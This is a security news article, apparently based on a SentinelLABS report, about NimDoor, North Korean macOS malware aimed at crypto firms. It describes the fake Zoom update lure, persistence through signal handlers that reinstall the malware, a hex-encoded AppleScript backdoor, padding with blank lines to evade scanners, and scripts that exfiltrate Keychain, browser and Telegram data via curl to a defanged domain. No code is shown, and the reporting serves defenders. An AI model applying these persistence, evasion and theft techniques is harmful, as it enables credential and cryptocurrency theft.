A group of hackers backed by the North Korean government is using a new type of malware for macOS called NimDoor. Its main target: companies and projects related to Web3 and cryptocurrencies.
According to researchers who analyzed this malware, the attackers are using some pretty unusual and never-before-seen techniques, including a system to stay active on the computer even after it's been deleted.
The attack starts very subtly: the hackers contact the victims via Telegram, posing as someone trustworthy. They then convince them to install a supposed “update” to the Zoom SDK. This fake update is sent via Calendly or even by email, making it appear legitimate. This entire method is quite reminiscent of a previous campaign attributed to the North Korean group BlueNoroff, known for using similar tactics.
A recent report revealed details about this rather sophisticated malware for macOS. Interestingly, the attackers behind this threat used binary files written in C++ and Nim, a programming language rarely seen in this type of attack, which in itself makes it quite unusual.
One of these files, called “installer,” takes the first step in the infection: it prepares the environment, creates the necessary folders, and sets up the paths where other malicious components will be installed. As part of that process, it drops two more files onto the system: “GoogIe LLC” (yes, with a capital “i” to resemble ‘Google’) and “CoreKitAgent.”
The first, GoogIe LLC, is tasked with collecting information about the infected system's environment and generating a configuration file that is encoded in hexadecimal (meaning it is not easy to read at a glance). That file is saved in a temporary folder and used to keep the malware active every time the computer starts up. It does this by installing a macOS LaunchAgent that runs automatically with each login, which also allows it to save authentication keys for future actions.
But the most advanced and dangerous component is CoreKitAgent, which is basically the “brain” of the malware. It is designed to react to system events in real time, using a native macOS system called kqueue, which allows it to execute tasks asynchronously, without interrupting the normal operation of the computer.
This module implements a kind of state machine, with 10 possible “scenarios” that are activated depending on what the system is doing. This structure gives it a lot of flexibility and control to decide how to act in different situations.
And the most disturbing thing? NimDoor has a rather original persistence system. It installs custom drivers that react to signals such as SIGINT (interruption) or SIGTERM (termination). In other words, if you try to close or kill the process, the malware can detect it and act to stay alive in the system.
Registering custom signal handlers for SIGINT and SIGTERM
These signals are normally used to shut down processes in the system, but in the case of NimDoor, something very different happens. When CoreKitAgent detects one of these signals, instead of shutting down, it activates a self-defense mechanism that reinstalls everything: it restores GoogIe LLC (the component that maintains access to the system) and reactivates the persistence chain to ensure that the malware remains active.
According to SentinelLABS, when this happens, CoreKitAgent captures the signal, rewrites the LaunchAgent file (which allows the malware to run at login), leaves a new copy of GoogIe LLC as a loader, and another of itself as a Trojan. It then gives them execution permissions using a specific function (addExecutionPermissions_user95startup95mainZutils_u32), which basically allows them to run again without any problems.
This behavior makes killing the malware process useless, as every time you try, it reinstalls itself in the background. In short: it is very difficult to remove with basic methods, and it is designed precisely to resist the most common defense attempts.
Rewrite the malware components to disk when the process ends
Read more: New SparkKitty malware found on Google Play and Apple Store
CoreKitAgent runs an AppleScript script that has been encoded in hexadecimal (i.e., disguised so that it is not noticeable at first glance). This script activates every 30 seconds, connects to the attacker's servers, and begins stealing information from the system, as well as allowing remote control of the computer using the osascript command. In other words, it acts as a very lightweight but effective backdoor.
Meanwhile, another malicious file called zoom_sdk_support.scpt launches a second phase of the attack. This file launches a component called trojan1_arm64, which connects to the attackers via encrypted communication using WSS (WebSocket Secure). Once the connection is active, it downloads two additional scripts called upl and tlgrm, whose sole purpose is to steal more data from the system.
Something curious (and worrying): the zoom_sdk_support.scpt file comes with more than 10,000 blank lines. This is not a mistake, but a technique used to hide the malicious code and make it go unnoticed in automatic analyses.
Now, let's explain what these two scripts do:
upl extracts sensitive data from the browser (such as cookies and saved passwords), as well as the contents of the macOS Keychain (where many system credentials are stored) and terminal command histories (.bash_history and .zsh_history). All this information is sent to a remote server using curl, specifically to the domain dataupload[.]tienda.
tlgrm, on the other hand, focuses on stealing the local Telegram database, including a file called .tempkeyEncrypted, which probably contains encrypted keys. Attackers could use this data to read private messages that the victim has exchanged on Telegram.
Telegram script targeting Telegram data
Overall, NimDoor and the other backdoors analyzed are among the most complex threats targeting macOS that have been linked to North Korean hacking groups.
What makes this malware particularly dangerous is its modular structure, which gives it a great deal of flexibility to adapt to different situations, as well as its use of fairly novel techniques, such as persistence mechanisms based on system signals. All of this suggests that these attackers are rapidly evolving their tools, making them increasingly sophisticated and capable of operating on multiple operating systems.
Malicious domains, file paths, scripts, and specific binaries used in these campaigns have also been identified, which are clearly designed to steal cryptocurrencies and sensitive information from victims. These technical details are key for security experts to detect and stop new infections before they cause damage.